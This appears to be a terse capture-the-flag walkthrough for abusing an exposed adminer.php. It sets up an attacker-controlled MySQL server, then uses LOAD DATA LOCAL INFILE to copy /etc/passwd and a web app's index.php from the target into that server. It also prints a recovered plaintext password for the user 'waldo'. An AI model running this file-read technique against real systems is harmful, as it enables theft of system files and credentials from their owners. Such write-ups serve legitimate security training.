4 adminer-php

Enumerate adminer.php

adminer.php

Using https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool

• Update bind-address=0.0.0.0 in /etc/mysql/mariadb.conf.d/50-server.cnf

• Need to setup mysql on kali. sudo service mysql start

• Reset root password for mysql using https://www.techrepublic.com/article/how-to-set-change-and-recover-a-mysql-root-password/

Create User on mysql

• CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';

• GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';

• FLUSH PRIVILEGES;

adminer.php login

adminer.php successful login

• Create database pwn

• Create table data with field out as varchar(256)

Trying to read /etc/passwd

load data local infile "/etc/passwd"
into table pwn.data
fields terminated by "\n";

adminer.php successful login

Trying to read /var/www/html/index.php

load data local infile "/var/www/html/index.php"
into table pwn.data
fields terminated by "\n";

adminer.php successful login

We see different password

adminer.php successful login

Using waldo:&<h5b~yK3F#{PaPB&dA}{H>

adminer.php successful login